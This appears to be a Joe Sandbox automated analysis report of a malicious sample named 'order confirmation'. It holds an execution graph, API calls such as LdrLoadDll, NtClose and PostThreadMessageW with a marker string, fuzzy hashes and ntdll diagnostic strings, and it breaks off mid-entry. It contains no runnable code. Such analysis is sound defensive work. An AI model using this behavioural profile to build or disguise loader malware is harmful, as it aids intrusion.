                                                    execution_graph 91532 424d63 91533 424d7f 91532->91533 91534 424da7 91533->91534 91535 424dbb 91533->91535 91536 42cab3 NtClose 91534->91536 91542 42cab3 91535->91542 91538 424db0 91536->91538 91539 424dc4 91545 42ec93 RtlAllocateHeap 91539->91545 91541 424dcf 91543 42cacd 91542->91543 91544 42cade NtClose 91543->91544 91544->91539 91545->91541 91684 42c073 91685 42c090 91684->91685 91688 13f2df0 LdrInitializeThunk 91685->91688 91686 42c0b8 91688->91686 91689 42fc13 91690 42fc23 91689->91690 91691 42fc29 91689->91691 91692 42ec53 RtlAllocateHeap 91691->91692 91693 42fc4f 91692->91693 91694 4250f3 91699 42510c 91694->91699 91695 42519c 91696 425154 91697 42eb73 RtlFreeHeap 91696->91697 91698 425164 91697->91698 91699->91695 91699->91696 91700 425197 91699->91700 91701 42eb73 RtlFreeHeap 91700->91701 91701->91695 91546 41e903 91548 41e929 91546->91548 91547 41ea25 91548->91547 91555 42fd43 91548->91555 91550 41e9ba 91550->91547 91551 41ea1c 91550->91551 91566 42c0c3 91550->91566 91551->91547 91561 428cf3 91551->91561 91554 41ead1 91556 42fcb3 91555->91556 91560 42fd10 91556->91560 91570 42ec53 91556->91570 91558 42fced 91573 42eb73 91558->91573 91560->91550 91562 428d58 91561->91562 91563 428d93 91562->91563 91582 418fd3 91562->91582 91563->91554 91565 428d75 91565->91554 91567 42c0e0 91566->91567 91590 13f2c0a 91567->91590 91568 42c10c 91568->91551 91576 42cde3 91570->91576 91572 42ec6e 91572->91558 91579 42ce33 91573->91579 91575 42eb8c 91575->91560 91577 42ce00 91576->91577 91578 42ce11 RtlAllocateHeap 91577->91578 91578->91572 91580 42ce50 91579->91580 91581 42ce61 RtlFreeHeap 91580->91581 91581->91575 91583 418f8e 91582->91583 91586 418fef 91582->91586 91587 42ce83 91583->91587 91585 418fbb 91585->91565 91588 42cea0 91587->91588 91589 42ceb1 ExitProcess 91588->91589 91589->91585 91591 13f2c1f LdrInitializeThunk 91590->91591 91592 13f2c11 91590->91592 91591->91568 91592->91568 91593 419283 91594 4192b3 91593->91594 91596 4192df 91594->91596 91597 41b733 91594->91597 91598 41b777 91597->91598 91599 42cab3 NtClose 91598->91599 91600 41b798 91598->91600 91599->91600 91600->91594 91601 4144a3 91602 4144bc 91601->91602 91607 417c23 91602->91607 91604 4144da 91605 414526 91604->91605 91606 414513 PostThreadMessageW 91604->91606 91606->91605 91608 417c47 91607->91608 91609 417c83 LdrLoadDll 91608->91609 91610 417c4e 91608->91610 91609->91610 91610->91604 91702 413f33 91703 413f55 91702->91703 91705 42cd43 91702->91705 91706 42cd5d 91705->91706 91709 13f2c70 LdrInitializeThunk 91706->91709 91707 42cd85 91707->91703 91709->91707 91611 401aee 91612 401b37 91611->91612 91612->91612 91615 4300e3 91612->91615 91618 42e723 91615->91618 91619 42e749 91618->91619 91630 407543 91619->91630 91621 42e75f 91622 401c7a 91621->91622 91633 41b543 91621->91633 91624 42e77e 91625 42e793 91624->91625 91627 42ce83 ExitProcess 91624->91627 91644 428603 91625->91644 91627->91625 91628 42e7ad 91629 42ce83 ExitProcess 91628->91629 91629->91622 91648 4168e3 91630->91648 91632 407550 91632->91621 91634 41b56f 91633->91634 91659 41b433 91634->91659 91637 41b5b4 91639 41b5d0 91637->91639 91642 42cab3 NtClose 91637->91642 91638 41b59c 91640 41b5a7 91638->91640 91641 42cab3 NtClose 91638->91641 91639->91624 91640->91624 91641->91640 91643 41b5c6 91642->91643 91643->91624 91646 428665 91644->91646 91645 428672 91645->91628 91646->91645 91670 418a93 91646->91670 91649 416900 91648->91649 91651 416919 91649->91651 91652 42d533 91649->91652 91651->91632 91653 42d54d 91652->91653 91654 42d57c 91653->91654 91655 42c0c3 LdrInitializeThunk 91653->91655 91654->91651 91656 42d5d9 91655->91656 91657 42eb73 RtlFreeHeap 91656->91657 91658 42d5f2 91657->91658 91658->91651 91660 41b44d 91659->91660 91664 41b529 91659->91664 91665 42c163 91660->91665 91663 42cab3 NtClose 91663->91664 91664->91637 91664->91638 91666 42c180 91665->91666 91669 13f35c0 LdrInitializeThunk 91666->91669 91667 41b51d 91667->91663 91669->91667 91671 418abd 91670->91671 91677 418fbb 91671->91677 91678 414113 91671->91678 91673 418be4 91674 42eb73 RtlFreeHeap 91673->91674 91673->91677 91675 418bfc 91674->91675 91676 42ce83 ExitProcess 91675->91676 91675->91677 91676->91677 91677->91645 91680 414133 91678->91680 91681 41419c 91680->91681 91683 41b853 RtlFreeHeap LdrInitializeThunk 91680->91683 91681->91673 91682 414192 91682->91673 91683->91682 91710 13f2b60 LdrInitializeThunk

                                                    Executed Functions

                                                    Function 00417C23 Relevance: 1.5, APIs: 1, Instructions: 48libraryloaderCOMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 78 417c23-417c3f 79 417c47-417c4c 78->79 80 417c42 call 42f753 78->80 81 417c52-417c60 call 42fd53 79->81 82 417c4e-417c51 79->82 80->79 85 417c70-417c81 call 42e1f3 81->85 86 417c62-417c6d call 42fff3 81->86 91 417c83-417c97 LdrLoadDll 85->91 92 417c9a-417c9d 85->92 86->85 91->92
                                                    APIs
                                                    • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 00417C95
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.1982675271.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_400000_order confirmation.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: Load
                                                    • String ID:
                                                    • API String ID: 2234796835-0
                                                    • Opcode ID: 54d6f386663d5f6ad0a9369f0d80f04f2da9edb397004349e0dbd63b4fb0560c
                                                    • Instruction ID: 852cf962e2409d618e8b38b88b5540d93302ef35c3232a8832e2f214825db3c9
                                                    • Opcode Fuzzy Hash: 54d6f386663d5f6ad0a9369f0d80f04f2da9edb397004349e0dbd63b4fb0560c
                                                    • Instruction Fuzzy Hash: 090125B5E0020DA7DF10DBE5DC42FDEB378AB54308F4081A6E90897241F675EB58C795
                                                    Function 0042CAB3 Relevance: 1.5, APIs: 1, Instructions: 25nativeCOMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 98 42cab3-42caec call 404883 call 42dd13 NtClose
                                                    APIs
                                                    • NtClose.NTDLL(?,?,00000000,00000000,0000001F,?,FA0A1F00), ref: 0042CAE7
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.1982675271.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_400000_order confirmation.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: Close
                                                    • String ID:
                                                    • API String ID: 3535843008-0
                                                    • Opcode ID: 0972272d2523aad39672e0d6cd6478e3c5c68d2fec25f3726e41a2152dbfdc4c
                                                    • Instruction ID: 1f7ce933016469cc88b19e90322ff2e304760343167cfa218f45b51e943dd486
                                                    • Opcode Fuzzy Hash: 0972272d2523aad39672e0d6cd6478e3c5c68d2fec25f3726e41a2152dbfdc4c
                                                    • Instruction Fuzzy Hash: A8E02C362102007BC620FAAADC01FAB736CEFC5B24F00402EFA08A7242C374B90083F0
                                                    Function 013F2B60 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 116 13f2b60-13f2b6c LdrInitializeThunk
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.1983329477.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_1380000_order confirmation.jbxd
                                                    Similarity
                                                    • API ID: InitializeThunk
                                                    • String ID:
                                                    • API String ID: 2994545307-0
                                                    • Opcode ID: d208d12b4b75d97e9a929b357e383fee6bb45a784ed539da1641cc64d77f1b62
                                                    • Instruction ID: b04462930b64444472992489cf7867f9500ee920909b320a7d27ae53cfb9f1af
                                                    • Opcode Fuzzy Hash: d208d12b4b75d97e9a929b357e383fee6bb45a784ed539da1641cc64d77f1b62
                                                    • Instruction Fuzzy Hash: 4990026161280143410671594514616400A97F0201B55C032E10145D5DC63589D16625
                                                    Function 013F2DF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 118 13f2df0-13f2dfc LdrInitializeThunk
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.1983329477.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_1380000_order confirmation.jbxd
                                                    Similarity
                                                    • API ID: InitializeThunk
                                                    • String ID:
                                                    • API String ID: 2994545307-0
                                                    • Opcode ID: 56a08a3936f89341aba5a2d687c57eb08a992b10046c0bbf8e0dd95a94d0ec11
                                                    • Instruction ID: c1f91a5473c388d4e295ec2b9208c2d6c648bfc0214ac60bfb8534ea61156d2d
                                                    • Opcode Fuzzy Hash: 56a08a3936f89341aba5a2d687c57eb08a992b10046c0bbf8e0dd95a94d0ec11
                                                    • Instruction Fuzzy Hash: 0F90023161180553D11271594604707000997E0241F95C423A042459DDD7768A92A621
                                                    Function 013F2C70 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 117 13f2c70-13f2c7c LdrInitializeThunk
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.1983329477.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_1380000_order confirmation.jbxd
                                                    Similarity
                                                    • API ID: InitializeThunk
                                                    • String ID:
                                                    • API String ID: 2994545307-0
                                                    • Opcode ID: 26abf816c0bd0d527bd554ced65dc960d12b95e29249d2c296c8777527dcfe12
                                                    • Instruction ID: 588fe6cd9f00427923295f1e6f00f600b68916a487e5e663b196aed6db70798d
                                                    • Opcode Fuzzy Hash: 26abf816c0bd0d527bd554ced65dc960d12b95e29249d2c296c8777527dcfe12
                                                    • Instruction Fuzzy Hash: 8390023161188942D1117159850474A000597E0301F59C422A442469DDC7B589D17621
                                                    Function 013F35C0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.1983329477.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_1380000_order confirmation.jbxd
                                                    Similarity
                                                    • API ID: InitializeThunk
                                                    • String ID:
                                                    • API String ID: 2994545307-0
                                                    • Opcode ID: 13047b5916f0e40fbb8aa3128b199226f046787430d704161e68e72d7ed6b819
                                                    • Instruction ID: 2ece09d45874a90a8061e125b3e37cba69ffaea4bc08337e837f6e70ec38ee91
                                                    • Opcode Fuzzy Hash: 13047b5916f0e40fbb8aa3128b199226f046787430d704161e68e72d7ed6b819
                                                    • Instruction Fuzzy Hash: A0900231A1590542D10171594614706100597E0201F65C422A04245ADDC7B58A916AA2
                                                    Function 0041449B Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 59threadwindowCOMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    APIs
                                                    • PostThreadMessageW.USER32(sE716IK71M,00000111,00000000,00000000), ref: 00414520
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.1982675271.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_400000_order confirmation.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: MessagePostThread
                                                    • String ID: sE716IK71M$sE716IK71M
                                                    • API String ID: 1836367815-922563818
                                                    • Opcode ID: b45cae07c9c219c099e0826546d53defafec1ad3bdbe238061a0a9cc026b5f1f
                                                    • Instruction ID: 2c93fbf58faf19b7145b43889d661f3b69fec038b2ff8a571458cfb118ad8616
                                                    • Opcode Fuzzy Hash: b45cae07c9c219c099e0826546d53defafec1ad3bdbe238061a0a9cc026b5f1f
                                                    • Instruction Fuzzy Hash: 4A110431E4021876EF219AA1AC42FEF7F789F81754F448059FA04BB281DAB856068BE5
                                                    Function 004144A3 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 57threadwindowCOMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 14 4144a3-4144b3 15 4144bc-414511 call 42f623 call 417c23 call 4047f3 call 425223 14->15 16 4144b7 call 42ec13 14->16 25 414533-414538 15->25 26 414513-414524 PostThreadMessageW 15->26 16->15 26->25 27 414526-414530 26->27 27->25
                                                    APIs
                                                    • PostThreadMessageW.USER32(sE716IK71M,00000111,00000000,00000000), ref: 00414520
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.1982675271.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_400000_order confirmation.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: MessagePostThread
                                                    • String ID: sE716IK71M$sE716IK71M
                                                    • API String ID: 1836367815-922563818
                                                    • Opcode ID: 3de012e5431b6b67fac50700b1926275c7c37100b9222c36437f17da7e8deb27
                                                    • Instruction ID: 8504cfec16b6aedebdd5f95c05872cee6fb7df1a624910d20b6db10e5d894ebc
                                                    • Opcode Fuzzy Hash: 3de012e5431b6b67fac50700b1926275c7c37100b9222c36437f17da7e8deb27
                                                    • Instruction Fuzzy Hash: 4C01D671E4021876EB2196A1AD02FDF7B7C9F41B54F444059FB047B2C1EBB86A068BE5
                                                    Function 0042CE33 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 29memoryCOMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 28 42ce33-42ce77 call 404883 call 42dd13 RtlFreeHeap
                                                    APIs
                                                    • RtlFreeHeap.NTDLL(00000000,00000004,00000000,?,00000007,00000000,00000004,00000000,?,000000F4), ref: 0042CE72
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.1982675271.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_400000_order confirmation.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: FreeHeap
                                                    • String ID: qiA
                                                    • API String ID: 3298025750-529955485
                                                    • Opcode ID: e3b5d95ba1a83d426d625c5e4c7fafcd7ca98a1b0cb9b90bc850c9ae22092b0e
                                                    • Instruction ID: 307251ad091670c87d9754cbc308c92c0932808cc59762c095a9376aec0cd4cc
                                                    • Opcode Fuzzy Hash: e3b5d95ba1a83d426d625c5e4c7fafcd7ca98a1b0cb9b90bc850c9ae22092b0e
                                                    • Instruction Fuzzy Hash: 0CE06D722042547BCB14EE99DC41EDB37ACEFC9714F00442EF909A7241C770B91086B5
                                                    Function 00417CDF Relevance: 1.6, APIs: 1, Instructions: 91libraryloaderCOMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 42 417cdf-417d05 43 417d06-417d07 42->43 44 417d09-417d18 43->44 45 417d6c-417d6e 43->45 48 417d1a-417d45 44->48 49 417ccf-417cdb 44->49 46 417d70-417d81 45->46 47 417dbe-417dde call 42ba63 45->47 48->43 59 417d47-417d48 48->59 56 417c83-417c97 LdrLoadDll 49->56 57 417c9a-417c9d 49->57 56->57 59->45
                                                    APIs
                                                    • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 00417C95
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.1982675271.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_400000_order confirmation.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: Load
                                                    • String ID:
                                                    • API String ID: 2234796835-0
                                                    • Opcode ID: a74df69d41897592aaf7166ddb8974ec87685279e0badbf6da0a133babb8fc0f
                                                    • Instruction ID: ce8e9651cd2f2632962265eba7574f4be5e24a99500c9861ae4b74542ff918d8
                                                    • Opcode Fuzzy Hash: a74df69d41897592aaf7166ddb8974ec87685279e0badbf6da0a133babb8fc0f
                                                    • Instruction Fuzzy Hash: F521F17254C20A9BCB019FB8EC41BF4B774CF06324F208799DCAD9B2D1E6255D4687D2
                                                    Function 00417C1C Relevance: 1.5, APIs: 1, Instructions: 49libraryloaderCOMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 60 417c1c-417c1e 61 417c20-417c4c call 42f753 60->61 62 417c58-417c60 60->62 74 417c52-417c60 call 42fd53 61->74 75 417c4e-417c51 61->75 63 417c70-417c81 call 42e1f3 62->63 64 417c62-417c6d call 42fff3 62->64 72 417c83-417c97 LdrLoadDll 63->72 73 417c9a-417c9d 63->73 64->63 72->73 74->63 74->64
                                                    APIs
                                                    • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 00417C95
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.1982675271.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_400000_order confirmation.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: Load
                                                    • String ID:
                                                    • API String ID: 2234796835-0
                                                    • Opcode ID: 1fd0e5ac93c599581ea8bd70fbed3e05817cf44cc4c3a5592a884bcc08fa010a
                                                    • Instruction ID: 75b5f9b12f12b08821b09bdb01f26dfbe1d2dcd7f16dd92e0ccb1d816d0901d5
                                                    • Opcode Fuzzy Hash: 1fd0e5ac93c599581ea8bd70fbed3e05817cf44cc4c3a5592a884bcc08fa010a
                                                    • Instruction Fuzzy Hash: 4801F5B1E44109ABDF10DBA0DC42FDE77749B14308F0082BAE9189B280F635E749C791
                                                    Function 0042CDE3 Relevance: 1.5, APIs: 1, Instructions: 29memoryCOMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 93 42cde3-42ce27 call 404883 call 42dd13 RtlAllocateHeap
                                                    APIs
                                                    • RtlAllocateHeap.NTDLL(?,0041E9BA,?,?,00000000,?,0041E9BA,?,?,?), ref: 0042CE22
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.1982675271.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_400000_order confirmation.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: AllocateHeap
                                                    • String ID:
                                                    • API String ID: 1279760036-0
                                                    • Opcode ID: bfaddf89e5a8eb70fee58dbc14e955cd0c08b1bcf189c1afe2af08f3aab36983
                                                    • Instruction ID: a4553a69e7b92f9cf539882023bc9044ba2095210ba8bf1258456adc3d3cad5f
                                                    • Opcode Fuzzy Hash: bfaddf89e5a8eb70fee58dbc14e955cd0c08b1bcf189c1afe2af08f3aab36983
                                                    • Instruction Fuzzy Hash: 13E039762003057BDA14EE59EC41EAB37ACEF89754F104419FE09A7241D770B9108AB5
                                                    Function 0042CE83 Relevance: 1.5, APIs: 1, Instructions: 25COMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 103 42ce83-42cebf call 404883 call 42dd13 ExitProcess
                                                    APIs
                                                    • ExitProcess.KERNEL32(?,00000000,00000000,?,07461022,?,?,07461022), ref: 0042CEBA
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.1982675271.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_400000_order confirmation.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: ExitProcess
                                                    • String ID:
                                                    • API String ID: 621844428-0
                                                    • Opcode ID: 604045ff2199d70e6ced359132bb827253c9192b951670fad5067483bfa99023
                                                    • Instruction ID: e3fc04d785b94c74c51f8313a7f33e58d860eb092d5abf4673d4ecc5aa500898
                                                    • Opcode Fuzzy Hash: 604045ff2199d70e6ced359132bb827253c9192b951670fad5067483bfa99023
                                                    • Instruction Fuzzy Hash: 7AE08C762002147BE620FB5ADC05F9B776CDFC5724F10842AFA08AB281CAB1BA0187F5
                                                    Function 00417CD6 Relevance: 1.5, APIs: 1, Instructions: 20libraryloaderCOMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 108 417cd6-417cdb 110 417c83-417c97 LdrLoadDll 108->110 111 417c9a-417c9d 108->111 110->111
                                                    APIs
                                                    • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 00417C95
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.1982675271.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_400000_order confirmation.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: Load
                                                    • String ID:
                                                    • API String ID: 2234796835-0
                                                    • Opcode ID: b0c3561975e8df5829d7d66e24a3c02e50a0ddf0ef6dad8d752497c06571edb3
                                                    • Instruction ID: 3234135dea13a840063d5cb5e5c33c926c874a0ab7bab67cfa608a0389ac5317
                                                    • Opcode Fuzzy Hash: b0c3561975e8df5829d7d66e24a3c02e50a0ddf0ef6dad8d752497c06571edb3
                                                    • Instruction Fuzzy Hash: 01E0127564410EABEB40CFC4C881FEDB3B4EB08208F109285E91C97240E530AA46CB85
                                                    Function 013F2C0A Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMONLIBRARYCODE
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 112 13f2c0a-13f2c0f 113 13f2c1f-13f2c26 LdrInitializeThunk 112->113 114 13f2c11-13f2c18 112->114
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.1983329477.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_1380000_order confirmation.jbxd
                                                    Similarity
                                                    • API ID: InitializeThunk
                                                    • String ID:
                                                    • API String ID: 2994545307-0
                                                    • Opcode ID: be1a45ff1c783afca4ed5f8db2847d83c70a74692a8304be6e2f9e853d9c4056
                                                    • Instruction ID: 40f17b9abc4e5a11b7234fde54eca58a87b5f9aed2c49df71f13bedcf31bee13
                                                    • Opcode Fuzzy Hash: be1a45ff1c783afca4ed5f8db2847d83c70a74692a8304be6e2f9e853d9c4056
                                                    • Instruction Fuzzy Hash: 26B09B71D019C5C5DE12E76447087177900B7D0705F15C076D3030686F8738C1D1E675

                                                    Non-executed Functions

                                                    Function 01432349 Relevance: 26.1, Strings: 20, Instructions: 1117COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.1983329477.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_1380000_order confirmation.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: @$@$CFGOptions$DisableExceptionChainValidation$DisableHeapLookaside$ExecuteOptions$FrontEndHeapDebugOptions$GlobalFlag$GlobalFlag2$Initializing the application verifier package failed with status 0x%08lx$LdrpInitializeExecutionOptions$MaxDeadActivationContexts$MaxLoaderThreads$MinimumStackCommitInBytes$RaiseExceptionOnPossibleDeadlock$ShutdownFlags$TracingFlags$UnloadEventTraceDepth$UseImpersonatedDeviceMap$minkernel\ntdll\ldrinit.c
                                                    • API String ID: 0-2160512332
                                                    • Opcode ID: 57a4aaba3fd7b6091dec39b91a55d8271e8afc12d2db20e78ca99cf338697e31
                                                    • Instruction ID: 0690fbc85b6e39226d86efc5590c0ad3a02e0fd217d974e5ad1ae8dc7e2427fc
                                                    • Opcode Fuzzy Hash: 57a4aaba3fd7b6091dec39b91a55d8271e8afc12d2db20e78ca99cf338697e31
                                                    • Instruction Fuzzy Hash: 33928E71604342ABE725DF29C841F6BBBE8BB88754F04491EFA94D7360D7B0E845CB92
                                                    Function 013E8620 Relevance: 17.7, Strings: 14, Instructions: 223COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    • Critical section debug info address, xrefs: 0142541F, 0142552E
                                                    • Critical section address., xrefs: 01425502
                                                    • Address of the debug info found in the active list., xrefs: 014254AE, 014254FA
                                                    • undeleted critical section in freed memory, xrefs: 0142542B
                                                    • corrupted critical section, xrefs: 014254C2
                                                    • Invalid debug info address of this critical section, xrefs: 014254B6
                                                    • First initialization stack trace. Use dps to dump it if non-NULL., xrefs: 014254E2
                                                    • Thread is in a state in which it cannot own a critical section, xrefs: 01425543
                                                    • Second initialization stack trace. Use dps to dump it if non-NULL., xrefs: 014254CE
                                                    • Thread identifier, xrefs: 0142553A
                                                    • double initialized or corrupted critical section, xrefs: 01425508
                                                    • Initialization stack trace. Use dps to dump it if non-NULL., xrefs: 0142540A, 01425496, 01425519
                                                    • Critical section address, xrefs: 01425425, 014254BC, 01425534
                                                    • 8, xrefs: 014252E3
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.1983329477.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_1380000_order confirmation.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: 8$Address of the debug info found in the active list.$Critical section address$Critical section address.$Critical section debug info address$First initialization stack trace. Use dps to dump it if non-NULL.$Initialization stack trace. Use dps to dump it if non-NULL.$Invalid debug info address of this critical section$Second initialization stack trace. Use dps to dump it if non-NULL.$Thread identifier$Thread is in a state in which it cannot own a critical section$corrupted critical section$double initialized or corrupted critical section$undeleted critical section in freed memory
                                                    • API String ID: 0-2368682639
                                                    • Opcode ID: cc8faa276f6b4509142d59d84c507ae91e312654550cb31f03b8b869a7c8e53a
                                                    • Instruction ID: 034469774adf101a0d5ea47d00ae87e049e3c53a5aa191d485c42d1e393c4be6
                                                    • Opcode Fuzzy Hash: cc8faa276f6b4509142d59d84c507ae91e312654550cb31f03b8b869a7c8e53a
                                                    • Instruction Fuzzy Hash: E8817C71A40368AFDF20CF99C845BEEBBB5FB49718F50415AE504BB390D375A981CB50
                                                    Function 013E29F9 Relevance: 14.2, Strings: 11, Instructions: 411COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    • RtlpResolveAssemblyStorageMapEntry, xrefs: 0142261F
                                                    • @, xrefs: 0142259B
                                                    • SXS: Unable to resolve storage root for assembly directory %wZ in %Iu tries, xrefs: 014224C0
                                                    • SXS: Unable to open assembly directory under storage root "%S"; Status = 0x%08lx, xrefs: 014225EB
                                                    • SXS: %s() bad parametersSXS: Map : %pSXS: Data : %pSXS: AssemblyRosterIndex: 0x%lxSXS: Map->AssemblyCount : 0x%lx, xrefs: 01422624
                                                    • SXS: Attempt to probe assembly storage root %wZ for assembly directory %wZ failed with status = 0x%08lx, xrefs: 01422498
                                                    • SXS: Assembly directory name stored in assembly information too long (%lu bytes) - ACTIVATION_CONTEXT_DATA at %p, xrefs: 014222E4
                                                    • SXS: Attempt to probe known root of assembly storage ("%wZ") failed; Status = 0x%08lx, xrefs: 01422409
                                                    • SXS: Attempt to translate DOS path name "%S" to NT format failed, xrefs: 01422506
                                                    • SXS: Storage resolution failed to insert entry to storage map; Status = 0x%08lx, xrefs: 01422602
                                                    • SXS: Attempt to insert well known storage root into assembly storage map assembly roster index %lu failed; Status = 0x%08lx, xrefs: 01422412
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.1983329477.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_1380000_order confirmation.jbxd
                                                    Similarity
                                                    • API ID:
